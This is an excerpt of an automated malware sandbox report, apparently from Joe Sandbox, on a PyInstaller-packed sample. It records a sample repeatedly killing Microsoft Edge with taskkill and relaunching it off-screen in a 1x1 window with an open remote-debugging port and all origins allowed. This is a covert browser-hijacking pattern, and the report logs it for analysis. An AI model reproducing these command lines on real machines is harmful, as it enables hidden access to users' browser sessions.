File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:12:58
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:13:03
Start date:	21/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	16:13:06
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	16:13:06
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	16:13:13
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff7dbb40000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	16:13:13
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	16:13:14
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	16:13:15
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	16:13:47
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff7dbb40000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	16:13:47
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	16:13:48
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	16:13:48
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	16:13:48
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	16:13:49
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	16:13:52
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff7dbb40000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	16:13:52
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	16:13:52
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	16:13:53
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	16:13:57
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff7dbb40000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	16:13:57
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	16:13:57
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	16:13:58
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	16:14:01
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff7dbb40000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	16:14:02
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	16:14:02
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	16:14:03
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	16:14:03
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	16:14:03
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1796 --field-trial-handle=1976,i,7400251867187163904,16596075297624197194,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	16:14:06
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff7dbb40000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	16:14:07
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	16:14:07
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	16:14:09
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	16:14:12
Start date:	21/11/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff7e52b0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	16:14:12
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	16:14:12
Start date:	21/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Imagebase:
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 053203B3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5320000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be2b1bd90ae2849fd6798d25e8c2374b5bf5ffbb8b79d98fbd8dbc25a083359
Instruction ID: 2451909314b46b4fef0f0273b1bafa34d647dd69f7a259c8b7f92928427ad703
Opcode Fuzzy Hash: 0be2b1bd90ae2849fd6798d25e8c2374b5bf5ffbb8b79d98fbd8dbc25a083359
Instruction Fuzzy Hash: B3F0F6B654CA30FF018ED1DA135D5B27D9FAA9B730730C426B10BC7F01D294097C9A22

Function 053202AB Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5320000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c701d59b1ffaa6ae11063e1c80da35686effa6a7891ed9118dc6cc5739cba5a
Instruction ID: 6eb4b67382571482876c09ad00edf222d710d71fa8f6aed7391f6a6c74f8a567
Opcode Fuzzy Hash: 5c701d59b1ffaa6ae11063e1c80da35686effa6a7891ed9118dc6cc5739cba5a
Instruction Fuzzy Hash: 5231CDB700DBB0AFE34BC6B0095C1F67FAFEA9323033440A7E482C6D53E145095E8622

Function 053203FF Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5320000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2feab2f8673c36c7a3ebcb9a2c88c88dd6dea98d7893eeead348f178bca0c0
Instruction ID: bc16e61f8861ee9661f68241fb26e20868a92923020ee79d70f26cf2e9bd9d39
Opcode Fuzzy Hash: ae2feab2f8673c36c7a3ebcb9a2c88c88dd6dea98d7893eeead348f178bca0c0
Instruction Fuzzy Hash: D8F0F0B204CE30EE018EE1E6534D9B23E5FBA9B770720C412B14BC6E01D1A81A7C9A22

Function 0532040F Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5320000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 259f5a41997cccc73b9f9525c90c19b9830b115ff3f9d0b86da56b0407bce1a8
Instruction ID: 2fc20095f811edbcdaa6f2fb9a11c2158f612d5389df5e40356dc28d76ba736c
Opcode Fuzzy Hash: 259f5a41997cccc73b9f9525c90c19b9830b115ff3f9d0b86da56b0407bce1a8
Instruction Fuzzy Hash: E5F0507380DA70DA934ED531048E1F27F5B3D53621358C46AA5839AF43D10B517FDA22

Function 053203D5 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5320000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070244ba679f27652d0b013e1b7beca1fc4320bbce517e52ab66dc2f9d39271f
Instruction ID: 9f7d5724343669df58f0dd54d6a6955a34ecb24db2447b06114343c94b5ed087
Opcode Fuzzy Hash: 070244ba679f27652d0b013e1b7beca1fc4320bbce517e52ab66dc2f9d39271f
Instruction Fuzzy Hash: 92F0E57244CD30EE408DE1DA224E5F27E5FBA5B671720C903B04BC5F01D268027D9E23

Function 0532044C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5320000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 318a5cf5b6c9fa913ad28be35c486c15724774d3188a17af98e890da15a1fa5a
Instruction ID: 5d184a169e58e84218e85181c8c37bfc382350de3729a3ab2ea4e8e0ced5bd9a
Opcode Fuzzy Hash: 318a5cf5b6c9fa913ad28be35c486c15724774d3188a17af98e890da15a1fa5a
Instruction Fuzzy Hash: E0E0683280CD30CA924DF57602CE0BA7A2F36A65207B0C817B803C6E02C20B52BE9C12

Function 05320464 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5320000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9121bb6ed29dd2515f17e56c4248fb41bc8f9514d67764969c4cb8b3399223
Instruction ID: 42d04b9097ae1db0df4be04476aa97c7d91739de37a7df101684467ce0c5e60c
Opcode Fuzzy Hash: 7a9121bb6ed29dd2515f17e56c4248fb41bc8f9514d67764969c4cb8b3399223
Instruction Fuzzy Hash: BED012B2409D30D940CEE266164E2F17D1F765AA353A0C603B98795F42821D06BC9D53

Analysis Process: samat.exePID: 5228, Parent PID: 4500COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	36

Executed Functions

Function 00007FF7E12C89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8A56

Part of subcall function 00007FF7E12DA47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DA490

Part of subcall function 00007FF7E12D871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D8783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8AE6
CreateProcessW.KERNELBASE ref: 00007FF7E12C8B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8B28

Part of subcall function 00007FF7E12C2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
Part of subcall function 00007FF7E12C2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
Part of subcall function 00007FF7E12C2C50: MessageBoxW.USER32 ref: 00007FF7E12C2D99

RegisterClassW.USER32 ref: 00007FF7E12C8B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8B8B
CreateWindowExW.USER32 ref: 00007FF7E12C8BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C15
PeekMessageW.USER32 ref: 00007FF7E12C8C39
TranslateMessage.USER32 ref: 00007FF7E12C8C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C51
PeekMessageW.USER32 ref: 00007FF7E12C8C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8E04
GetExitCodeProcess.KERNELBASE ref: 00007FF7E12C8E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8E2F

Strings

PyInstaller Onefile Hidden Window, xrefs: 00007FF7E12C8B95
CreateProcessW, xrefs: 00007FF7E12C8B37
PyInstallerOnefileHiddenWindow, xrefs: 00007FF7E12C8B54
Failed to create child process!, xrefs: 00007FF7E12C8B30

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
